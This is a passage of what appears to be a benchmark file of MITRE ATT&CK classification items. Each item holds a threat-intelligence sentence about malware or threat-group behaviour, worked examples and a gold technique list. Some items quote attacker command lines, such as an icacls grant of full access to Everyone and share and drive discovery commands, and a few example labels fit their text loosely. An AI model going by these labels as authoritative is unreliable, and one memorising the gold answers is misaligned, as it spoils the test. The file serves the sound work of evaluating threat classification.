Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kimsuky has enumerated drives, OS type, OS version, and other information using a script or the \"systeminfo\" command.\n\t - T1082: System Information Discovery\n- Text: When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation\n\t - T1047: Windows Management Instrumentation\n\t - T1218.005: System Binary Proxy Execution - Mshta\n\t - T1559.001: Inter-Process Communication - Component Object Model\n\t - T1027: Obfuscated Files or Information\n- Text: collects the victim\u2019s username and whether that user is an admin.\n\t - T1033: System Owner/User Discovery\n", + "input": "During its initial execution, BACKSPACE extracts operating system information from the infected host.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has compromised domains to use for C2.\n\t - T1584.001: Compromise Infrastructure - Domains\n- Text: Dragonfly has compromised websites to redirect traffic and to host exploit kits.\n\t - T1608.004: Stage Capabilities - Drive-by Target\n- Text: Turla has infected victims using watering holes.\n\t - T1189: Drive-by Compromise\n", + "input": "During C0010, UNC3890 actors likely compromised the domain of a legitimate Israeli shipping company.", + "gold": "- T1584.001: Compromise Infrastructure - Domains", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RDAT has masqueraded as VMware.exe.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: build_downer has added itself to the Registry Run key as \"NVIDIA\" to appear legitimate.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: 2. The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows). 3. The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following: GUP.exe : GUP, a free (LGPL) Generic Updater. GUP is an open source binary used by Notepad++ for software updates\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1106: Native API\n\t - T1036: Masquerading\n\t - T1010: Application Window Discovery\n", + "input": "Mis-Type saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: QuietSieve can identify and search removable drives for specific file name extensions.\n\t - T1120: Peripheral Device Discovery\n- Text: The \"net view \\\\remotesystem\" and \"net share\" commands in Net can be used to find shared drives and directories on remote and local systems respectively.\n\t - T1135: Network Share Discovery\n- Text: Emissary has the capability to execute the command \"net localgroup administrators\".\n\t - T1069.001: Permission Groups Discovery - Local Groups\n", + "input": "During Operation CuckooBees, the threat actors used the `fsutil fsinfo drives` command as part of their advanced reconnaissance.", + "gold": "- T1120: Peripheral Device Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers.\n\t - T1210: Exploitation of Remote Services\n- Text: The PipeMon installer has modified the Registry key \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\" to install PipeMon as a Print Processor.\n\t - T1547.012: Boot or Logon Autostart Execution - Print Processors\n- Text: attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.\n\t - T1068: Exploitation for Privilege Escalation\n", + "input": "Flame can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.", + "gold": "- T1068: Exploitation for Privilege Escalation\n- T1210: Exploitation of Remote Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.\n\t - T1482: Domain Trust Discovery\n- Text: The threat actor used RDP on Active Directory using leaked accounts. The actor dropped scanning tools, Nmap.exe and Nping.exe, for scanning the network. Next, the scheduled task was pushed by the group policy domain machine.\n\t - T1484: Domain or Tenant Policy Modification\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Empire includes various modules for enumerating Group Policy.\n\t - T1615: Group Policy Discovery\n", + "input": "BloodHound has the ability to map domain trusts and identify misconfigurations for potential abuse.", + "gold": "- T1482: Domain Trust Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SLOTHFULMEDIA has created a service on victim machines named \"TaskFrame\" to establish persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: No matching sample found for T1546.016\n- Text: Bazar's loader can delete scheduled tasks created by a previous instance of the malware.\n\t - T1070: Indicator Removal\n\t - T1070.009: Indicator Removal - Clear Persistence\n", + "input": "Seasalt is capable of installing itself as a service.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Prior to encryption, the ransomware will check if the directory is in the root path and avoids the following files and directories\n\t - T1083: File and Directory Discovery\n- Text: Explosive can scan all .exe files located in the USB drive.\n\t - T1025: Data from Removable Media\n- Text: has the capability to retrieve information about shares on remote hosts.\n\t - T1135: Network Share Discovery\n", + "input": "PLEAD has the ability to list drives and files on the compromised host.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When the .lnk file is initialized, it spawns a CMD process. This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: can create a remote shell and run a given command.\n\t - T1059: Command and Scripting Interpreter\n- Text: As covered above, the attacker dropped two files: Chaos and Client. Chaos is the backdoor that enables the reverse-shell and Client is needed to initiate the connect-back from chaos\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n", + "input": "APT1 has used the Windows command shell to execute commands.", + "gold": "- T1059: Command and Scripting Interpreter", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lokibot is delivered via a malicious XLS attachment contained within a spearhpishing email.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: APT37 has sent spearphishing attachments attempting to get a user to open them.\n\t - T1204.002: User Execution - Malicious File\n- Text: EXOTIC LILY has relied on victims to open malicious links in e-mails for execution.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Inception has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sandworm Team has used the BlackEnergy KillDisk component to overwrite files on Windows-based Human-Machine Interfaces.\n\t - T1485: Data Destruction\n- Text: creates then deletes log files during installation of itself as a service.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Magic Hound has modified Registry settings for security tools.\n\t - T1112: Modify Registry\n", + "input": "PowerDuke has a command to write random data across a file and delete it.", + "gold": "- T1070.004: Indicator Removal - File Deletion\n- T1485: Data Destruction", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kimsuky has packed malware with UPX.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Gamaredon Group has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads. Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems.\n\t - T1221: Template Injection\n- Text: Samples associated with either RedAlpha campaign remain quite rare, with less than 20 samples identified across the two campaigns. Custom samples are coded in C++. The 2018 dropper relied on a rare C++ cross-platform framework called Haxe to string together pieces of publicly available source code largely found in Chinese-language forums and blogs.\n\t - T1587.001: Develop Capabilities - Malware\n", + "input": "Mongall has been packed with Themida.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The browser extension serves as adware and an infostealer, leaking all of the user\u2019s search engine queries. We discovered significant changes and additions of capabilities throughout this campaign's evolution, and we predict further changes as this campaign continues.\n\t - T1217: Browser Information Discovery\n- Text: During Operation CuckooBees, the threat actors used the `net user` command to gather account information.\n\t - T1087.001: Account Discovery - Local Account\n- Text: The screenshot also shows the Glimpse server receiving the results of the whoami command executed by the agent\n\t - T1033: System Owner/User Discovery\n", + "input": "Chimera has used \"type \\\\\\c$\\Users\\\\Favorites\\Links\\Bookmarks bar\\Imported From IE\\*citrix*\" for bookmark discovery.", + "gold": "- T1217: Browser Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation CuckooBees, the threat actors used the `query user` and `whoami` commands as part of their advanced reconnaissance.\n\t - T1033: System Owner/User Discovery\n- Text: Kazuar gathers information on local groups and members on the victim\u2019s machine.\n\t - T1087.001: Account Discovery - Local Account\n- Text: jRAT collects information about the OS (version, build type, install date) as well as system up-time upon receiving a connection from a backdoor.\n\t - T1082: System Information Discovery\n", + "input": "Frankenstein has enumerated hosts, gathering username, machine name, and administrative permissions information.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bankshot searches for certain Registry keys to be configured before executing the payload.\n\t - T1012: Query Registry\n- Text: Valak can use the clientgrabber module to steal e-mail credentials from the Registry.\n\t - T1552.002: Unsecured Credentials - Credentials in Registry\n- Text: Pillowmint has stored its malicious payload in the registry key \"HKLM\\SOFTWARE\\Microsoft\\DRM\".\n\t - T1112: Modify Registry\n", + "input": "Reg may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GravityRAT steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.\n\t - T1005: Data from Local System\n- Text: Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.\n\t - T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB\n", + "input": "Machete logs keystrokes from the victim\u2019s machine.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The payload is an application that creates a hidden window (the name of the class and the window is SK_Parasite\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen\n\t - T1087.001: Account Discovery - Local Account\n\t - T1098: Account Manipulation\n\t - T1136.001: Create Account - Local Account\n\t - T1564.002: Hide Artifacts - Hidden Users\n- Text: The exact date when the malware was compiled is unknown \u2013 the recent wrapper DLL samples were tampered with by the malware authors, with the PE timestamps manually set to zero values. However, during our research, we found an earlier version of the malware with a PE timestamp reading Oct 13, 2013, so the compilation date of the later version is almost surely more recent\n\t - T1070.006: Indicator Removal - Timestomp\n", + "input": "Ixeshe sets its own executable file's attributes to hidden.", + "gold": "- T1564.001: Hide Artifacts - Hidden Files and Directories", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After dropping these files to its working directory, the malware attempts to change the attributes of all the files to \u201chidden\u201d and grant full access to all files in the current directory and any directories below. It does this by executing \u201cattrib +h .\u201d, followed by \u201cicacls . /grant Everyone:F /T /C /Q\n\t - T1222.001: File and Directory Permissions Modification - Windows File and Directory Permissions Modification\n- Text: A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1064: Scripting\n\t - T1027: Obfuscated Files or Information\n- Text: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.\n\t - T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking\n", + "input": "Ryuk can launch \"icacls /grant Everyone:F /T /C /Q\" to delete every access-based restrictions on files and directories.", + "gold": "- T1222.001: File and Directory Permissions Modification - Windows File and Directory Permissions Modification", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Penquin installs a `TCP` and `UDP` filter on the `eth0` interface.\n\t - T1205.002: Traffic Signaling - Socket Filters\n- Text: Office365DCOMCheck.vbs or SystemDiskClean.vbs) within the %TEMP% folder: CreateObject(\"WScript.Shell\").Run \"\" & WScript.Arguments(0) & \"\", 0, False The scheduled task will then run every five minutes, which provides persistent execution of the downloader script\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Penquin can execute remote commands using bash scripts.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n", + "input": "TURNEDUP is capable of creating a reverse shell.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: T9000 gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.\n\t - T1033: System Owner/User Discovery\n- Text: The screenshot above shows an abbreviated view of the in-memory PowerShell backdoor. The PowerShell backdoor has the following capabilities\n\t - T1049: System Network Connections Discovery\n\t - T1518: Software Discovery\n\t - T1027: Obfuscated Files or Information\n- Text: Valak can determine if a compromised host has security products installed.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "Windshift has used malware to identify the username on a compromised host.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This account was suspended in short order, but immediately after the suspension, an alternate account with the username @dookhtegan1 with the same stylized profile image appeared and is still currently active\n\t - T1033: System Owner/User Discovery\n\t - T1087: Account Discovery\n- Text: APT3 has used a tool that can obtain info about local and global group users, power users, and administrators.\n\t - T1087.001: Account Discovery - Local Account\n- Text: has run a plug-in on a victim to spread through the local network by using and accessing admin shares.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n", + "input": "Moses Staff has collected the administrator username from a compromised host.", + "gold": "- T1087.001: Account Discovery - Local Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: QUADAGENT uses HTTPS and HTTP for C2 communications.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Kazuar encodes communications to the C2 server in Base64.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as\n\t - T1571: Non-Standard Port\n", + "input": "DarkComet can use HTTP for C2 communications.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OutSteel has relied on a user to click a malicious link within a spearphishing email.\n\t - T1204.001: User Execution - Malicious Link\n- Text: Narrow attacks targeted the Automotive industry among others, while the large malicious spam campaigns appear to be associated with threat actor TA505, an actor responsible for many large-scale attacks since at least 2014\n\t - T1204.002: User Execution - Malicious File\n- Text: During Night Dragon, threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Machete has has relied on users opening malicious links delivered through spearphishing to execute malware.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses commands such as netsh interface show to discover network interface settings.\n\t - T1016: System Network Configuration Discovery\n- Text: No matching sample found for T1557.002\n- Text: Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C \u2013 common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments\n\t - T1568.003: Dynamic Resolution - DNS Calculation\n", + "input": "Pisloader has a command to collect the victim's IP address.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: used the Ammyy Admin tool as well as TeamViewer for remote access.\n\t - T1219: Remote Access Software\n- Text: Interestingly, the actors chose to leverage Cobalt Strike for lateral movement. The first of several beacon files are dropped onto the same infected endpoint running Brute Ratel C4, with the first being:\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1588.001: Obtain Capabilities - Malware\n- Text: 1) Ferocious dropper: The Excel dropper, after the user opens it and disables the protected mode, will execute a series of formulas placed in a hidden column. Initially, they will hide the main spreadsheet that requested the user to \u201cenable editing\u201d, then unhide a secondary spreadsheet that contains the decoy, to avoid raising suspicion. Otherwise, the macro will open a temporary %ProgramData%\\winrm.txt file and save a VBS stager to %ProgramData%\\winrm.vbs and set up registry keys for persistence. Otherwise, the macro will open a temporary %ProgramData%\\winrm.txt file and save a VBS stager to %ProgramData%\\winrm.vbs and set up registry keys for persistence. 5) Ferocious run-1: After the macro finishes writing to disk, it runs winrm.vbs using explorer.exe. The VBS script will also add two important registry keys for persistence. The persistence technique observed in all intrusions uses COM hijacking. In this technique, the threat actor is able to add a Class ID in the current user registry hive (HKCU) referencing the malicious VBS script written previously to %ProgramData%\\winrm.vbs. Registry keys used for COM hijacking After the above execution chain, the Excel 4.0 macro will clean up and delete the winrm.vbs and winrm.txt files. 6) Ferocious run-2: The macro will continue after the cleanup by recreating and opening the same files, winrm.vbs and winrm.txt\n\t - T1112: Modify Registry\n", + "input": "RTM has used a modified version of TeamViewer and Remote Utilities for remote access.", + "gold": "- T1219: Remote Access Software", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.\n\t - T1005: Data from Local System\n- Text: UPPERCUT has the capability to gather the victim's proxy information.\n\t - T1016: System Network Configuration Discovery\n- Text: ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2.\n\t - T1124: System Time Discovery\n", + "input": "PcShare can collect files and information from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: EXOTIC LILY has created e-mail accounts to spoof targeted organizations.\n\t - T1585.002: Establish Accounts - Email Accounts\n- Text: Gamaredon Group has registered 